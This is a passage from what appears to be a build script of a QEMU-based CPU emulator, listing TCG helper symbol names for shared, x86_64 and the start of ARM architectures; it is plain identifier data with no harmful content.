cpu_ldl_data_ra \ cpu_ldq_data_ra \ cpu_ldub_data \ cpu_ldsb_data \ cpu_lduw_data \ cpu_ldsw_data \ cpu_ldl_data \ cpu_ldq_data \ helper_ret_stb_mmu \ helper_le_stw_mmu \ helper_be_stw_mmu \ helper_le_stl_mmu \ helper_be_stl_mmu \ helper_le_stq_mmu \ helper_be_stq_mmu \ cpu_stb_mmuidx_ra \ cpu_stw_mmuidx_ra \ cpu_stl_mmuidx_ra \ cpu_stq_mmuidx_ra \ cpu_stb_data_ra \ cpu_stw_data_ra \ cpu_stl_data_ra \ cpu_stq_data_ra \ cpu_stb_data \ cpu_stw_data \ cpu_stl_data \ cpu_stq_data \ helper_atomic_cmpxchgb_mmu \ helper_atomic_xchgb_mmu \ helper_atomic_fetch_addb_mmu \ helper_atomic_fetch_andb_mmu \ helper_atomic_fetch_orb_mmu \ helper_atomic_fetch_xorb_mmu \ helper_atomic_add_fetchb_mmu \ helper_atomic_and_fetchb_mmu \ helper_atomic_or_fetchb_mmu \ helper_atomic_xor_fetchb_mmu \ helper_atomic_fetch_sminb_mmu \ helper_atomic_fetch_uminb_mmu \ helper_atomic_fetch_smaxb_mmu \ helper_atomic_fetch_umaxb_mmu \ helper_atomic_smin_fetchb_mmu \ helper_atomic_umin_fetchb_mmu \ helper_atomic_smax_fetchb_mmu \ helper_atomic_umax_fetchb_mmu \ helper_atomic_cmpxchgw_le_mmu \ helper_atomic_xchgw_le_mmu \ helper_atomic_fetch_addw_le_mmu \ helper_atomic_fetch_andw_le_mmu \ helper_atomic_fetch_orw_le_mmu \ helper_atomic_fetch_xorw_le_mmu \ helper_atomic_add_fetchw_le_mmu \ helper_atomic_and_fetchw_le_mmu \ helper_atomic_or_fetchw_le_mmu \ helper_atomic_xor_fetchw_le_mmu \ helper_atomic_fetch_sminw_le_mmu \ helper_atomic_fetch_uminw_le_mmu \ helper_atomic_fetch_smaxw_le_mmu \ helper_atomic_fetch_umaxw_le_mmu \ helper_atomic_smin_fetchw_le_mmu \ helper_atomic_umin_fetchw_le_mmu \ helper_atomic_smax_fetchw_le_mmu \ helper_atomic_umax_fetchw_le_mmu \ helper_atomic_cmpxchgw_be_mmu \ helper_atomic_xchgw_be_mmu \ helper_atomic_fetch_andw_be_mmu \ helper_atomic_fetch_orw_be_mmu \ helper_atomic_fetch_xorw_be_mmu \ helper_atomic_and_fetchw_be_mmu \ helper_atomic_or_fetchw_be_mmu \ helper_atomic_xor_fetchw_be_mmu \ helper_atomic_fetch_sminw_be_mmu \ helper_atomic_fetch_uminw_be_mmu \ helper_atomic_fetch_smaxw_be_mmu \ helper_atomic_fetch_umaxw_be_mmu \ helper_atomic_smin_fetchw_be_mmu \ helper_atomic_umin_fetchw_be_mmu \ helper_atomic_smax_fetchw_be_mmu \ helper_atomic_umax_fetchw_be_mmu \ helper_atomic_fetch_addw_be_mmu \ helper_atomic_add_fetchw_be_mmu \ helper_atomic_cmpxchgl_le_mmu \ helper_atomic_xchgl_le_mmu \ helper_atomic_fetch_addl_le_mmu \ helper_atomic_fetch_andl_le_mmu \ helper_atomic_fetch_orl_le_mmu \ helper_atomic_fetch_xorl_le_mmu \ helper_atomic_add_fetchl_le_mmu \ helper_atomic_and_fetchl_le_mmu \ helper_atomic_or_fetchl_le_mmu \ helper_atomic_xor_fetchl_le_mmu \ helper_atomic_fetch_sminl_le_mmu \ helper_atomic_fetch_uminl_le_mmu \ helper_atomic_fetch_smaxl_le_mmu \ helper_atomic_fetch_umaxl_le_mmu \ helper_atomic_smin_fetchl_le_mmu \ helper_atomic_umin_fetchl_le_mmu \ helper_atomic_smax_fetchl_le_mmu \ helper_atomic_umax_fetchl_le_mmu \ helper_atomic_cmpxchgl_be_mmu \ helper_atomic_xchgl_be_mmu \ helper_atomic_fetch_andl_be_mmu \ helper_atomic_fetch_orl_be_mmu \ helper_atomic_fetch_xorl_be_mmu \ helper_atomic_and_fetchl_be_mmu \ helper_atomic_or_fetchl_be_mmu \ helper_atomic_xor_fetchl_be_mmu \ helper_atomic_fetch_sminl_be_mmu \ helper_atomic_fetch_uminl_be_mmu \ helper_atomic_fetch_smaxl_be_mmu \ helper_atomic_fetch_umaxl_be_mmu \ helper_atomic_smin_fetchl_be_mmu \ helper_atomic_umin_fetchl_be_mmu \ helper_atomic_smax_fetchl_be_mmu \ helper_atomic_umax_fetchl_be_mmu \ helper_atomic_fetch_addl_be_mmu \ helper_atomic_add_fetchl_be_mmu \ helper_atomic_cmpxchgq_le_mmu \ helper_atomic_xchgq_le_mmu \ helper_atomic_fetch_addq_le_mmu \ helper_atomic_fetch_andq_le_mmu \ helper_atomic_fetch_orq_le_mmu \ helper_atomic_fetch_xorq_le_mmu \ helper_atomic_add_fetchq_le_mmu \ helper_atomic_and_fetchq_le_mmu \ helper_atomic_or_fetchq_le_mmu \ helper_atomic_xor_fetchq_le_mmu \ helper_atomic_fetch_sminq_le_mmu \ helper_atomic_fetch_uminq_le_mmu \ helper_atomic_fetch_smaxq_le_mmu \ helper_atomic_fetch_umaxq_le_mmu \ helper_atomic_smin_fetchq_le_mmu \ helper_atomic_umin_fetchq_le_mmu \ helper_atomic_smax_fetchq_le_mmu \ helper_atomic_umax_fetchq_le_mmu \ helper_atomic_cmpxchgq_be_mmu \ helper_atomic_xchgq_be_mmu \ helper_atomic_fetch_andq_be_mmu \ helper_atomic_fetch_orq_be_mmu \ helper_atomic_fetch_xorq_be_mmu \ helper_atomic_and_fetchq_be_mmu \ helper_atomic_or_fetchq_be_mmu \ helper_atomic_xor_fetchq_be_mmu \ helper_atomic_fetch_sminq_be_mmu \ helper_atomic_fetch_uminq_be_mmu \ helper_atomic_fetch_smaxq_be_mmu \ helper_atomic_fetch_umaxq_be_mmu \ helper_atomic_smin_fetchq_be_mmu \ helper_atomic_umin_fetchq_be_mmu \ helper_atomic_smax_fetchq_be_mmu \ helper_atomic_umax_fetchq_be_mmu \ helper_atomic_fetch_addq_be_mmu \ helper_atomic_add_fetchq_be_mmu \ helper_atomic_cmpxchgb \ helper_atomic_xchgb \ helper_atomic_fetch_addb \ helper_atomic_fetch_andb \ helper_atomic_fetch_orb \ helper_atomic_fetch_xorb \ helper_atomic_add_fetchb \ helper_atomic_and_fetchb \ helper_atomic_or_fetchb \ helper_atomic_xor_fetchb \ helper_atomic_fetch_sminb \ helper_atomic_fetch_uminb \ helper_atomic_fetch_smaxb \ helper_atomic_fetch_umaxb \ helper_atomic_smin_fetchb \ helper_atomic_umin_fetchb \ helper_atomic_smax_fetchb \ helper_atomic_umax_fetchb \ helper_atomic_cmpxchgw_le \ helper_atomic_xchgw_le \ helper_atomic_fetch_addw_le \ helper_atomic_fetch_andw_le \ helper_atomic_fetch_orw_le \ helper_atomic_fetch_xorw_le \ helper_atomic_add_fetchw_le \ helper_atomic_and_fetchw_le \ helper_atomic_or_fetchw_le \ helper_atomic_xor_fetchw_le \ helper_atomic_fetch_sminw_le \ helper_atomic_fetch_uminw_le \ helper_atomic_fetch_smaxw_le \ helper_atomic_fetch_umaxw_le \ helper_atomic_smin_fetchw_le \ helper_atomic_umin_fetchw_le \ helper_atomic_smax_fetchw_le \ helper_atomic_umax_fetchw_le \ helper_atomic_cmpxchgw_be \ helper_atomic_xchgw_be \ helper_atomic_fetch_andw_be \ helper_atomic_fetch_orw_be \ helper_atomic_fetch_xorw_be \ helper_atomic_and_fetchw_be \ helper_atomic_or_fetchw_be \ helper_atomic_xor_fetchw_be \ helper_atomic_fetch_sminw_be \ helper_atomic_fetch_uminw_be \ helper_atomic_fetch_smaxw_be \ helper_atomic_fetch_umaxw_be \ helper_atomic_smin_fetchw_be \ helper_atomic_umin_fetchw_be \ helper_atomic_smax_fetchw_be \ helper_atomic_umax_fetchw_be \ helper_atomic_fetch_addw_be \ helper_atomic_add_fetchw_be \ helper_atomic_cmpxchgl_le \ helper_atomic_xchgl_le \ helper_atomic_fetch_addl_le \ helper_atomic_fetch_andl_le \ helper_atomic_fetch_orl_le \ helper_atomic_fetch_xorl_le \ helper_atomic_add_fetchl_le \ helper_atomic_and_fetchl_le \ helper_atomic_or_fetchl_le \ helper_atomic_xor_fetchl_le \ helper_atomic_fetch_sminl_le \ helper_atomic_fetch_uminl_le \ helper_atomic_fetch_smaxl_le \ helper_atomic_fetch_umaxl_le \ helper_atomic_smin_fetchl_le \ helper_atomic_umin_fetchl_le \ helper_atomic_smax_fetchl_le \ helper_atomic_umax_fetchl_le \ helper_atomic_cmpxchgl_be \ helper_atomic_xchgl_be \ helper_atomic_fetch_andl_be \ helper_atomic_fetch_orl_be \ helper_atomic_fetch_xorl_be \ helper_atomic_and_fetchl_be \ helper_atomic_or_fetchl_be \ helper_atomic_xor_fetchl_be \ helper_atomic_fetch_sminl_be \ helper_atomic_fetch_uminl_be \ helper_atomic_fetch_smaxl_be \ helper_atomic_fetch_umaxl_be \ helper_atomic_smin_fetchl_be \ helper_atomic_umin_fetchl_be \ helper_atomic_smax_fetchl_be \ helper_atomic_umax_fetchl_be \ helper_atomic_fetch_addl_be \ helper_atomic_add_fetchl_be \ helper_atomic_cmpxchgq_le \ helper_atomic_xchgq_le \ helper_atomic_fetch_addq_le \ helper_atomic_fetch_andq_le \ helper_atomic_fetch_orq_le \ helper_atomic_fetch_xorq_le \ helper_atomic_add_fetchq_le \ helper_atomic_and_fetchq_le \ helper_atomic_or_fetchq_le \ helper_atomic_xor_fetchq_le \ helper_atomic_fetch_sminq_le \ helper_atomic_fetch_uminq_le \ helper_atomic_fetch_smaxq_le \ helper_atomic_fetch_umaxq_le \ helper_atomic_smin_fetchq_le \ helper_atomic_umin_fetchq_le \ helper_atomic_smax_fetchq_le \ helper_atomic_umax_fetchq_le \ helper_atomic_cmpxchgq_be \ helper_atomic_xchgq_be \ helper_atomic_fetch_andq_be \ helper_atomic_fetch_orq_be \ helper_atomic_fetch_xorq_be \ helper_atomic_and_fetchq_be \ helper_atomic_or_fetchq_be \ helper_atomic_xor_fetchq_be \ helper_atomic_fetch_sminq_be \ helper_atomic_fetch_uminq_be \ helper_atomic_fetch_smaxq_be \ helper_atomic_fetch_umaxq_be \ helper_atomic_smin_fetchq_be \ helper_atomic_umin_fetchq_be \ helper_atomic_smax_fetchq_be \ helper_atomic_umax_fetchq_be \ helper_atomic_fetch_addq_be \ helper_atomic_add_fetchq_be \ cpu_ldub_code \ cpu_lduw_code \ cpu_ldl_code \ cpu_ldq_code \ helper_div_i32 \ helper_rem_i32 \ helper_divu_i32 \ helper_remu_i32 \ helper_shl_i64 \ helper_shr_i64 \ helper_sar_i64 \ helper_div_i64 \ helper_rem_i64 \ helper_divu_i64 \ helper_remu_i64 \ helper_muluh_i64 \ helper_mulsh_i64 \ helper_clz_i32 \ helper_ctz_i32 \ helper_clz_i64 \ helper_ctz_i64 \ helper_clrsb_i32 \ helper_clrsb_i64 \ helper_ctpop_i32 \ helper_ctpop_i64 \ helper_lookup_tb_ptr \ helper_exit_atomic \ helper_gvec_add8 \ helper_gvec_add16 \ helper_gvec_add32 \ helper_gvec_add64 \ helper_gvec_adds8 \ helper_gvec_adds16 \ helper_gvec_adds32 \ helper_gvec_adds64 \ helper_gvec_sub8 \ helper_gvec_sub16 \ helper_gvec_sub32 \ helper_gvec_sub64 \ helper_gvec_subs8 \ helper_gvec_subs16 \ helper_gvec_subs32 \ helper_gvec_subs64 \ helper_gvec_mul8 \ helper_gvec_mul16 \ helper_gvec_mul32 \ helper_gvec_mul64 \ helper_gvec_muls8 \ helper_gvec_muls16 \ helper_gvec_muls32 \ helper_gvec_muls64 \ helper_gvec_neg8 \ helper_gvec_neg16 \ helper_gvec_neg32 \ helper_gvec_neg64 \ helper_gvec_abs8 \ helper_gvec_abs16 \ helper_gvec_abs32 \ helper_gvec_abs64 \ helper_gvec_mov \ helper_gvec_dup64 \ helper_gvec_dup32 \ helper_gvec_dup16 \ helper_gvec_dup8 \ helper_gvec_not \ helper_gvec_and \ helper_gvec_or \ helper_gvec_xor \ helper_gvec_andc \ helper_gvec_orc \ helper_gvec_nand \ helper_gvec_nor \ helper_gvec_eqv \ helper_gvec_ands \ helper_gvec_xors \ helper_gvec_ors \ helper_gvec_shl8i \ helper_gvec_shl16i \ helper_gvec_shl32i \ helper_gvec_shl64i \ helper_gvec_shr8i \ helper_gvec_shr16i \ helper_gvec_shr32i \ helper_gvec_shr64i \ helper_gvec_sar8i \ helper_gvec_sar16i \ helper_gvec_sar32i \ helper_gvec_sar64i \ helper_gvec_shl8v \ helper_gvec_shl16v \ helper_gvec_shl32v \ helper_gvec_shl64v \ helper_gvec_shr8v \ helper_gvec_shr16v \ helper_gvec_shr32v \ helper_gvec_shr64v \ helper_gvec_sar8v \ helper_gvec_sar16v \ helper_gvec_sar32v \ helper_gvec_sar64v \ helper_gvec_eq8 \ helper_gvec_ne8 \ helper_gvec_lt8 \ helper_gvec_le8 \ helper_gvec_ltu8 \ helper_gvec_leu8 \ helper_gvec_eq16 \ helper_gvec_ne16 \ helper_gvec_lt16 \ helper_gvec_le16 \ helper_gvec_ltu16 \ helper_gvec_leu16 \ helper_gvec_eq32 \ helper_gvec_ne32 \ helper_gvec_lt32 \ helper_gvec_le32 \ helper_gvec_ltu32 \ helper_gvec_leu32 \ helper_gvec_eq64 \ helper_gvec_ne64 \ helper_gvec_lt64 \ helper_gvec_le64 \ helper_gvec_ltu64 \ helper_gvec_leu64 \ helper_gvec_ssadd8 \ helper_gvec_ssadd16 \ helper_gvec_ssadd32 \ helper_gvec_ssadd64 \ helper_gvec_sssub8 \ helper_gvec_sssub16 \ helper_gvec_sssub32 \ helper_gvec_sssub64 \ helper_gvec_usadd8 \ helper_gvec_usadd16 \ helper_gvec_usadd32 \ helper_gvec_usadd64 \ helper_gvec_ussub8 \ helper_gvec_ussub16 \ helper_gvec_ussub32 \ helper_gvec_ussub64 \ helper_gvec_smin8 \ helper_gvec_smin16 \ helper_gvec_smin32 \ helper_gvec_smin64 \ helper_gvec_smax8 \ helper_gvec_smax16 \ helper_gvec_smax32 \ helper_gvec_smax64 \ helper_gvec_umin8 \ helper_gvec_umin16 \ helper_gvec_umin32 \ helper_gvec_umin64 \ helper_gvec_umax8 \ helper_gvec_umax16 \ helper_gvec_umax32 \ helper_gvec_umax64 \ helper_gvec_bitsel \ cpu_restore_state \ page_collection_lock \ page_collection_unlock \ free_code_gen_buffer \ tcg_exec_init \ tb_cleanup \ tb_flush \ tb_phys_invalidate \ tb_gen_code \ tb_exec_lock \ tb_exec_unlock \ tb_invalidate_phys_page_range \ tb_invalidate_phys_range \ tb_invalidate_phys_page_fast \ tb_check_watchpoint \ cpu_io_recompile \ tb_flush_jmp_cache \ tcg_flush_softmmu_tlb \ translator_loop_temp_check \ translator_loop \ helper_atomic_cmpxchgo_le_mmu \ helper_atomic_cmpxchgo_be_mmu \ helper_atomic_ldo_le_mmu \ helper_atomic_ldo_be_mmu \ helper_atomic_sto_le_mmu \ helper_atomic_sto_be_mmu \ unassigned_mem_ops \ floatx80_infinity \ dup_const_func \ gen_helper_raise_exception \ gen_helper_raise_interrupt \ gen_helper_vfp_get_fpscr \ gen_helper_vfp_set_fpscr \ gen_helper_cpsr_read \ gen_helper_cpsr_write \ tlb_reset_dirty_by_vaddr \ " x86_64_SYMBOLS=" cpu_get_tsc \ x86_cpu_get_memory_mapping \ cpu_x86_update_dr7 \ breakpoint_handler \ helper_single_step \ helper_rechecking_single_step \ helper_set_dr \ helper_get_dr \ helper_bpt_io \ helper_cc_compute_all \ cpu_cc_compute_all \ helper_cc_compute_c \ helper_write_eflags \ helper_read_eflags \ helper_clts \ helper_reset_rf \ helper_cli \ helper_sti \ helper_clac \ helper_stac \ get_register_name_32 \ host_cpuid \ host_vendor_fms \ x86_cpu_set_default_version \ cpu_clear_apic_feature \ cpu_x86_cpuid \ x86_cpu_pending_interrupt \ x86_update_hflags \ cpu_x86_init \ helper_raise_interrupt \ helper_raise_exception \ raise_interrupt \ raise_exception_err \ raise_exception_err_ra \ raise_exception \ raise_exception_ra \ x86_cpu_tlb_fill \ cpu_set_ignne \ helper_flds_FT0 \ helper_fldl_FT0 \ helper_fildl_FT0 \ helper_flds_ST0 \ helper_fldl_ST0 \ helper_fildl_ST0 \ helper_fildll_ST0 \ helper_fsts_ST0 \ helper_fstl_ST0 \ helper_fist_ST0 \ helper_fistl_ST0 \ helper_fistll_ST0 \ helper_fistt_ST0 \ helper_fisttl_ST0 \ helper_fisttll_ST0 \ helper_fldt_ST0 \ helper_fstt_ST0 \ helper_fpush \ helper_fpop \ helper_fdecstp \ helper_fincstp \ helper_ffree_STN \ helper_fmov_ST0_FT0 \ helper_fmov_FT0_STN \ helper_fmov_ST0_STN \ helper_fmov_STN_ST0 \ helper_fxchg_ST0_STN \ helper_fcom_ST0_FT0 \ helper_fucom_ST0_FT0 \ helper_fcomi_ST0_FT0 \ helper_fucomi_ST0_FT0 \ helper_fadd_ST0_FT0 \ helper_fmul_ST0_FT0 \ helper_fsub_ST0_FT0 \ helper_fsubr_ST0_FT0 \ helper_fdiv_ST0_FT0 \ helper_fdivr_ST0_FT0 \ helper_fadd_STN_ST0 \ helper_fmul_STN_ST0 \ helper_fsub_STN_ST0 \ helper_fsubr_STN_ST0 \ helper_fdiv_STN_ST0 \ helper_fdivr_STN_ST0 \ helper_fchs_ST0 \ helper_fabs_ST0 \ helper_fld1_ST0 \ helper_fldl2t_ST0 \ helper_fldl2e_ST0 \ helper_fldpi_ST0 \ helper_fldlg2_ST0 \ helper_fldln2_ST0 \ helper_fldz_ST0 \ helper_fldz_FT0 \ helper_fnstsw \ helper_fnstcw \ update_fp_status \ helper_fldcw \ helper_fclex \ helper_fwait \ helper_fninit \ helper_fbld_ST0 \ helper_fbst_ST0 \ helper_f2xm1 \ helper_fyl2x \ helper_fptan \ helper_fpatan \ helper_fxtract \ helper_fprem1 \ helper_fprem \ helper_fyl2xp1 \ helper_fsqrt \ helper_fsincos \ helper_frndint \ helper_fscale \ helper_fsin \ helper_fcos \ helper_fxam_ST0 \ helper_fstenv \ helper_fldenv \ helper_fsave \ helper_frstor \ helper_fxsave \ helper_xsave \ helper_xsaveopt \ helper_fxrstor \ helper_xrstor \ helper_xgetbv \ helper_xsetbv \ update_mxcsr_status \ helper_ldmxcsr \ helper_enter_mmx \ helper_emms \ helper_movq \ helper_psrlw_mmx \ helper_psraw_mmx \ helper_psllw_mmx \ helper_psrld_mmx \ helper_psrad_mmx \ helper_pslld_mmx \ helper_psrlq_mmx \ helper_psllq_mmx \ helper_paddb_mmx \ helper_paddw_mmx \ helper_paddl_mmx \ helper_paddq_mmx \ helper_psubb_mmx \ helper_psubw_mmx \ helper_psubl_mmx \ helper_psubq_mmx \ helper_paddusb_mmx \ helper_paddsb_mmx \ helper_psubusb_mmx \ helper_psubsb_mmx \ helper_paddusw_mmx \ helper_paddsw_mmx \ helper_psubusw_mmx \ helper_psubsw_mmx \ helper_pminub_mmx \ helper_pmaxub_mmx \ helper_pminsw_mmx \ helper_pmaxsw_mmx \ helper_pand_mmx \ helper_pandn_mmx \ helper_por_mmx \ helper_pxor_mmx \ helper_pcmpgtb_mmx \ helper_pcmpgtw_mmx \ helper_pcmpgtl_mmx \ helper_pcmpeqb_mmx \ helper_pcmpeqw_mmx \ helper_pcmpeql_mmx \ helper_pmullw_mmx \ helper_pmulhrw_mmx \ helper_pmulhuw_mmx \ helper_pmulhw_mmx \ helper_pavgb_mmx \ helper_pavgw_mmx \ helper_pmuludq_mmx \ helper_pmaddwd_mmx \ helper_psadbw_mmx \ helper_maskmov_mmx \ helper_movl_mm_T0_mmx \ helper_movq_mm_T0_mmx \ helper_pshufw_mmx \ helper_pmovmskb_mmx \ helper_packsswb_mmx \ helper_packuswb_mmx \ helper_packssdw_mmx \ helper_punpcklbw_mmx \ helper_punpcklwd_mmx \ helper_punpckldq_mmx \ helper_punpckhbw_mmx \ helper_punpckhwd_mmx \ helper_punpckhdq_mmx \ helper_pi2fd \ helper_pi2fw \ helper_pf2id \ helper_pf2iw \ helper_pfacc \ helper_pfadd \ helper_pfcmpeq \ helper_pfcmpge \ helper_pfcmpgt \ helper_pfmax \ helper_pfmin \ helper_pfmul \ helper_pfnacc \ helper_pfpnacc \ helper_pfrcp \ helper_pfrsqrt \ helper_pfsub \ helper_pfsubr \ helper_pswapd \ helper_pshufb_mmx \ helper_phaddw_mmx \ helper_phaddd_mmx \ helper_phaddsw_mmx \ helper_pmaddubsw_mmx \ helper_phsubw_mmx \ helper_phsubd_mmx \ helper_phsubsw_mmx \ helper_pabsb_mmx \ helper_pabsw_mmx \ helper_pabsd_mmx \ helper_pmulhrsw_mmx \ helper_psignb_mmx \ helper_psignw_mmx \ helper_psignd_mmx \ helper_palignr_mmx \ helper_psrlw_xmm \ helper_psraw_xmm \ helper_psllw_xmm \ helper_psrld_xmm \ helper_psrad_xmm \ helper_pslld_xmm \ helper_psrlq_xmm \ helper_psllq_xmm \ helper_psrldq_xmm \ helper_pslldq_xmm \ helper_paddb_xmm \ helper_paddw_xmm \ helper_paddl_xmm \ helper_paddq_xmm \ helper_psubb_xmm \ helper_psubw_xmm \ helper_psubl_xmm \ helper_psubq_xmm \ helper_paddusb_xmm \ helper_paddsb_xmm \ helper_psubusb_xmm \ helper_psubsb_xmm \ helper_paddusw_xmm \ helper_paddsw_xmm \ helper_psubusw_xmm \ helper_psubsw_xmm \ helper_pminub_xmm \ helper_pmaxub_xmm \ helper_pminsw_xmm \ helper_pmaxsw_xmm \ helper_pand_xmm \ helper_pandn_xmm \ helper_por_xmm \ helper_pxor_xmm \ helper_pcmpgtb_xmm \ helper_pcmpgtw_xmm \ helper_pcmpgtl_xmm \ helper_pcmpeqb_xmm \ helper_pcmpeqw_xmm \ helper_pcmpeql_xmm \ helper_pmullw_xmm \ helper_pmulhuw_xmm \ helper_pmulhw_xmm \ helper_pavgb_xmm \ helper_pavgw_xmm \ helper_pmuludq_xmm \ helper_pmaddwd_xmm \ helper_psadbw_xmm \ helper_maskmov_xmm \ helper_movl_mm_T0_xmm \ helper_movq_mm_T0_xmm \ helper_shufps \ helper_shufpd \ helper_pshufd_xmm \ helper_pshuflw_xmm \ helper_pshufhw_xmm \ helper_addps \ helper_addss \ helper_addpd \ helper_addsd \ helper_subps \ helper_subss \ helper_subpd \ helper_subsd \ helper_mulps \ helper_mulss \ helper_mulpd \ helper_mulsd \ helper_divps \ helper_divss \ helper_divpd \ helper_divsd \ helper_minps \ helper_minss \ helper_minpd \ helper_minsd \ helper_maxps \ helper_maxss \ helper_maxpd \ helper_maxsd \ helper_sqrtps \ helper_sqrtss \ helper_sqrtpd \ helper_sqrtsd \ helper_cvtps2pd \ helper_cvtpd2ps \ helper_cvtss2sd \ helper_cvtsd2ss \ helper_cvtdq2ps \ helper_cvtdq2pd \ helper_cvtpi2ps \ helper_cvtpi2pd \ helper_cvtsi2ss \ helper_cvtsi2sd \ helper_cvtsq2ss \ helper_cvtsq2sd \ helper_cvtps2dq \ helper_cvtpd2dq \ helper_cvtps2pi \ helper_cvtpd2pi \ helper_cvtss2si \ helper_cvtsd2si \ helper_cvtss2sq \ helper_cvtsd2sq \ helper_cvttps2dq \ helper_cvttpd2dq \ helper_cvttps2pi \ helper_cvttpd2pi \ helper_cvttss2si \ helper_cvttsd2si \ helper_cvttss2sq \ helper_cvttsd2sq \ helper_rsqrtps \ helper_rsqrtss \ helper_rcpps \ helper_rcpss \ helper_extrq_r \ helper_extrq_i \ helper_insertq_r \ helper_insertq_i \ helper_haddps \ helper_haddpd \ helper_hsubps \ helper_hsubpd \ helper_addsubps \ helper_addsubpd \ helper_cmpeqps \ helper_cmpeqss \ helper_cmpeqpd \ helper_cmpeqsd \ helper_cmpltps \ helper_cmpltss \ helper_cmpltpd \ helper_cmpltsd \ helper_cmpleps \ helper_cmpless \ helper_cmplepd \ helper_cmplesd \ helper_cmpunordps \ helper_cmpunordss \ helper_cmpunordpd \ helper_cmpunordsd \ helper_cmpneqps \ helper_cmpneqss \ helper_cmpneqpd \ helper_cmpneqsd \ helper_cmpnltps \ helper_cmpnltss \ helper_cmpnltpd \ helper_cmpnltsd \ helper_cmpnleps \ helper_cmpnless \ helper_cmpnlepd \ helper_cmpnlesd \ helper_cmpordps \ helper_cmpordss \ helper_cmpordpd \ helper_cmpordsd \ helper_ucomiss \ helper_comiss \ helper_ucomisd \ helper_comisd \ helper_movmskps \ helper_movmskpd \ helper_pmovmskb_xmm \ helper_packsswb_xmm \ helper_packuswb_xmm \ helper_packssdw_xmm \ helper_punpcklbw_xmm \ helper_punpcklwd_xmm \ helper_punpckldq_xmm \ helper_punpcklqdq_xmm \ helper_punpckhbw_xmm \ helper_punpckhwd_xmm \ helper_punpckhdq_xmm \ helper_punpckhqdq_xmm \ helper_pshufb_xmm \ helper_phaddw_xmm \ helper_phaddd_xmm \ helper_phaddsw_xmm \ helper_pmaddubsw_xmm \ helper_phsubw_xmm \ helper_phsubd_xmm \ helper_phsubsw_xmm \ helper_pabsb_xmm \ helper_pabsw_xmm \ helper_pabsd_xmm \ helper_pmulhrsw_xmm \ helper_psignb_xmm \ helper_psignw_xmm \ helper_psignd_xmm \ helper_palignr_xmm \ helper_pblendvb_xmm \ helper_blendvps_xmm \ helper_blendvpd_xmm \ helper_ptest_xmm \ helper_pmovsxbw_xmm \ helper_pmovsxbd_xmm \ helper_pmovsxbq_xmm \ helper_pmovsxwd_xmm \ helper_pmovsxwq_xmm \ helper_pmovsxdq_xmm \ helper_pmovzxbw_xmm \ helper_pmovzxbd_xmm \ helper_pmovzxbq_xmm \ helper_pmovzxwd_xmm \ helper_pmovzxwq_xmm \ helper_pmovzxdq_xmm \ helper_pmuldq_xmm \ helper_pcmpeqq_xmm \ helper_packusdw_xmm \ helper_pminsb_xmm \ helper_pminsd_xmm \ helper_pminuw_xmm \ helper_pminud_xmm \ helper_pmaxsb_xmm \ helper_pmaxsd_xmm \ helper_pmaxuw_xmm \ helper_pmaxud_xmm \ helper_pmulld_xmm \ helper_phminposuw_xmm \ helper_roundps_xmm \ helper_roundpd_xmm \ helper_roundss_xmm \ helper_roundsd_xmm \ helper_blendps_xmm \ helper_blendpd_xmm \ helper_pblendw_xmm \ helper_dpps_xmm \ helper_dppd_xmm \ helper_mpsadbw_xmm \ helper_pcmpgtq_xmm \ helper_pcmpestri_xmm \ helper_pcmpestrm_xmm \ helper_pcmpistri_xmm \ helper_pcmpistrm_xmm \ helper_crc32 \ helper_pclmulqdq_xmm \ helper_aesdec_xmm \ helper_aesdeclast_xmm \ helper_aesenc_xmm \ helper_aesenclast_xmm \ helper_aesimc_xmm \ helper_aeskeygenassist_xmm \ cpu_sync_bndcs_hflags \ cpu_x86_support_mca_broadcast \ x86_cpu_set_a20 \ cpu_x86_update_cr0 \ cpu_x86_update_cr3 \ cpu_x86_update_cr4 \ x86_cpu_get_phys_page_attrs_debug \ cpu_x86_get_descr_debug \ do_cpu_init \ do_cpu_sipi \ x86_cpu_exec_enter \ x86_cpu_exec_exit \ x86_ldub_phys \ x86_lduw_phys \ x86_ldl_phys \ x86_ldq_phys \ x86_stb_phys \ x86_stl_phys_notdirty \ x86_stw_phys \ x86_stl_phys \ x86_stq_phys \ helper_divb_AL \ helper_idivb_AL \ helper_divw_AX \ helper_idivw_AX \ helper_divl_EAX \ helper_idivl_EAX \ helper_aam \ helper_aad \ helper_aaa \ helper_aas \ helper_daa \ helper_das \ helper_divq_EAX \ helper_idivq_EAX \ helper_pdep \ helper_pext \ helper_rclb \ helper_rcrb \ helper_rclw \ helper_rcrw \ helper_rcll \ helper_rcrl \ helper_rclq \ helper_rcrq \ helper_cr4_testbit \ helper_rdrand \ helper_cmpxchg8b_unlocked \ helper_cmpxchg8b \ helper_cmpxchg16b_unlocked \ helper_cmpxchg16b \ helper_boundw \ helper_boundl \ helper_outb \ helper_inb \ helper_outw \ helper_inw \ helper_outl \ helper_inl \ helper_into \ helper_cpuid \ helper_read_crN \ helper_write_crN \ helper_lmsw \ helper_invlpg \ helper_rdtsc \ helper_rdtscp \ helper_rdpmc \ helper_wrmsr \ helper_rdmsr \ helper_hlt \ helper_monitor \ helper_mwait \ helper_pause \ helper_debug \ helper_rdpkru \ helper_wrpkru \ helper_bndck \ helper_bndldx64 \ helper_bndldx32 \ helper_bndstx64 \ helper_bndstx32 \ helper_bnd_jmp \ helper_syscall \ helper_sysret \ x86_cpu_do_interrupt \ do_interrupt_x86_hardirq \ x86_cpu_exec_interrupt \ helper_lldt \ helper_ltr \ uc_check_cpu_x86_load_seg \ helper_load_seg \ helper_ljmp_protected \ helper_lcall_real \ helper_lcall_protected \ helper_iret_real \ helper_iret_protected \ helper_lret_protected \ helper_sysenter \ helper_sysexit \ helper_lsl \ helper_lar \ helper_verr \ helper_verw \ cpu_x86_load_seg \ helper_check_iob \ helper_check_iow \ helper_check_iol \ do_smm_enter \ helper_rsm \ helper_vmrun \ helper_vmmcall \ helper_vmload \ helper_vmsave \ helper_stgi \ helper_clgi \ helper_skinit \ helper_invlpga \ cpu_svm_check_intercept_param \ helper_svm_check_intercept_param \ helper_svm_check_io \ cpu_vmexit \ do_vmexit \ tcg_x86_init \ gen_intermediate_code \ restore_state_to_opc \ x86_cpu_xsave_all_areas \ x86_cpu_xrstor_all_areas \ cpu_get_fp80 \ cpu_set_fp80 \ " arm_SYMBOLS=" arm_cpu_exec_interrupt \ arm_cpu_update_virq \ arm_cpu_update_vfiq \ arm_cpu_initfn \ gt_cntfrq_period_ns \ arm_cpu_post_init \ arm_cpu_realizefn \ a15_l2ctlr_read \ arm_cpu_class_init \ cpu_arm_init \ helper_crypto_aese \ helper_crypto_aesmc \ helper_crypto_sha1_3reg \ helper_crypto_sha1h \ 